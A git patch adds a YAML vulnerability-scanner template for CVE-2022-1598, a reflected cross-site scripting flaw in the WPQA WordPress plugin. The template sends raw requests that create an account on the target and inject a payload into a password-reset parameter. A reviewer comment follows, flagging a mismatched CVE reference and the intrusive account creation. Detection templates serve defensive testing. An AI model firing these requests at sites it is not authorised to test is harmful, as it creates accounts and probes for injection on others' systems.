From 23321e1cda6d0e032ea8675595b72867db6576c0 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 17 May 2022 15:26:45 +0700 Subject: [PATCH] Add CVE-2022-1598 --- cves/2022/CVE-2022-1598.yaml | 56 ++++++++++++++++++++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 cves/2022/CVE-2022-1598.yaml diff --git a/cves/2022/CVE-2022-1598.yaml b/cves/2022/CVE-2022-1598.yaml new file mode 100644 index 0000000000..10c5f42bb5 --- /dev/null +++ b/cves/2022/CVE-2022-1598.yaml 
@@ -0,0 +1,56 @@
+id: CVE-2022-1598
+
+info:
+ name: WPQA < 5.4 - Reflected Cross-Site Scripting
+ author: veshraj
+ severity: medium
+ description: |
+ The plugin, used as a companion for the Discy and Himer themes,
+ does not sanitise and escape a parameter on its reset password
+ form which makes it possible to perform reflected XSS.
+ reference:
+ - https://wpscan.com/vulnerability/faff9484-9fc7-4300-bdad-9cd8a30a9a4e
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1597
+ tags: xss,wordpress,wp-plugin,wp,cve,cve2022
+
+variables:
+ user: "{{to_lower(rand_base(5))}}"
+ pass: "{{user}}{{to_lower(rand_base(3))}}"
+
+requests:
+ - raw:
+ - |
+ POST /wp-admin/admin-ajax.php HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
+ Content-Type: application/x-www-form-urlencoded
+
+ user_name={{user}}&email={{user}}@{{Host}}&pass1={{pass}}&pass2={{pass}}&form_type=wpqa-signup&action=wpqa_ajax_signup_process
+
+ - |
+ POST /wp-admin/admin-ajax.php HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
+ Content-Type: application/x-www-form-urlencoded
+
+ user_mail={{user}}@{{Host}}&form_type=wpqa_forget&action=wpqa_ajax_password_process&redirect_to={{url_encode(redirect_to)}}
+
+ payloads:
+ redirect_to:
+ - '">'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{redirect_to}}"
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
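Review bot: The MITRE reference in `info.reference` points at `CVE-2022-1597` while the template `id` is `CVE-2022-1598`, so one of the two identifiers is wrong and should be reconciled against the wpscan advisory before this is merged. The first raw request registers a real account on the target (`action=wpqa_ajax_signup_process` with a random user name and password) and the second triggers a password-reset mail to `{{user}}@{{Host}}`; that is a persistent, intrusive side effect the description does not mention, so add a line such as `# NOTE: creates a throw-away user on the target and triggers a reset e-mail` (or the repository's intrusive tag, if it has one) so operators can exclude the template from non-intrusive runs. The body matcher only looks for `{{redirect_to}}`, and if the payload really is just `">` as shown here it will match ordinary attribute boundaries in almost any HTML page; unless the angle-bracketed part of the payload was stripped in rendering, the payload should carry a distinctive marker that cannot appear in a benign response.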